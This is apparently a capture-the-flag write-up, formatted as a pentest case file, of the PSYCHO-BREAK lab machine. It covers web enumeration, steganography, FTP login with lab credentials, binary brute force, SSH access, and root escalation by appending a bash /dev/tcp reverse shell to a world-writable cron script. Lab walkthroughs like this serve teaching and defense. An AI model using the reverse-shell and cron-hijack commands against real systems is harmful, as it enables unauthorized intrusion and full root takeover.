Web puzzle chain, FTP stego, and world-writable root cron
Foundations Linux engagement: themed web puzzles and stego yielded FTP credentials; a local binary brute-forced kidman’s SSH password; a world-writable root cron script completed privilege escalation.
- Case files
- Web puzzle chain, FTP stego, and world-writable root cron
Multi-stage web enumeration and steganography recovered FTP access. Offline brute force of a downloaded binary produced SSH credentials; a world-writable root cron finished the engagement.
Dirbust and steghide recovered joseph’s FTP password from an image and Morse audio.
Dictionary against the FTP binary recovered key kidman; T9 output decoded to kidman’s SSH password.
Appended a reverse shell to /var/.the_eye_of_ruvik.py; cron executed it as root.
Engagement summary
Multi-stage web enumeration and steganography recovered FTP access. Offline brute force of a downloaded binary produced SSH credentials; a world-writable root cron finished the engagement.
Against PSYCHO-BREAK (10.10.184.161), Apache, ProFTPD, and OpenSSH were exposed. A themed web path through sadistRoom and SafeHeaven/keeper produced locker keys, an Atbash clue, and a limited RCE that disclosed a zip download. Steghide on Joseph_Oda.jpg (passphrase from Morse audio) yielded FTP joseph / intotheterror445. FTP held a binary and dictionary; brute-forcing the binary key kidman printed a T9 string that decoded to KIDMANSPASSWORDISSOSTRANGE for SSH. /var/.the_eye_of_ruvik.py ran as root every two minutes and was world-writable — appending a reverse shell completed root.
Business impact
Puzzle-style secrets in production still become credentials. World-writable cron executed as root is intentional privilege escalation. Lock cron scripts to root:root 755, remove stego-bearing assets from shares, and treat FTP as a credential store that must be authenticated and monitored.
Web puzzles, stego, and FTP foothold
Dirbust and steghide recovered joseph’s FTP password from an image and Morse audio.
OPERATOR · RECON
savvy@lab:~$ nmap 10.10.184.161 -sV
21/tcp open ftp ProFTPD 1.3.5a
22/tcp open ssh OpenSSH 7.2p2
80/tcp open http Apache httpd 2.4.18
savvy@lab:~$ dirsearch -u http://10.10.184.161/SafeHeaven/ -w directory-list-2.3-medium.txt
/SafeHeaven/keeper/
OPERATOR · STEGO / FTP
savvy@lab:~$ steghide extract -sf Joseph_Oda.jpg -p SHOWME
wrote extracted data to thankyou.txt
savvy@lab:~$ ftp 10.10.184.161
Name: joseph
Password: intotheterror445
ftp> get program
ftp> get random.dic
Binary brute force to SSH
Dictionary against the FTP binary recovered key kidman; T9 output decoded to kidman’s SSH password.
OPERATOR · BINARY / SSH
# brute program with random.dic → key: kidman → T9 decode
KIDMANSPASSWORDISSOSTRANGE
savvy@lab:~$ ssh kidman@10.10.184.161
savvy@lab:~$
World-writable root cron
Appended a reverse shell to /var/.the_eye_of_ruvik.py; cron executed it as root.
OPERATOR · CRON
savvy@lab:~$ cat /etc/crontab
*/2 * * * * root python3 /var/.the_eye_of_ruvik.py
savvy@lab:~$ ls -la /var/.the_eye_of_ruvik.py
-rwxr-xrw- 1 root root ... .the_eye_of_ruvik.py
savvy@lab:~$ echo 'import os; os.system("bash -i >& /dev/tcp/OPERATOR_IP/4444 0>&1")' >> /var/.the_eye_of_ruvik.py
savvy@lab:~$ nc -lnvp 4444
root@lab:~# id
uid=0(root) gid=0(root) groups=0(root)
Remediation
Make cron scripts root-owned and non-writable by users. Disable anonymous or weakly authenticated FTP. Do not leave offline-crackable binaries and dictionaries on shares.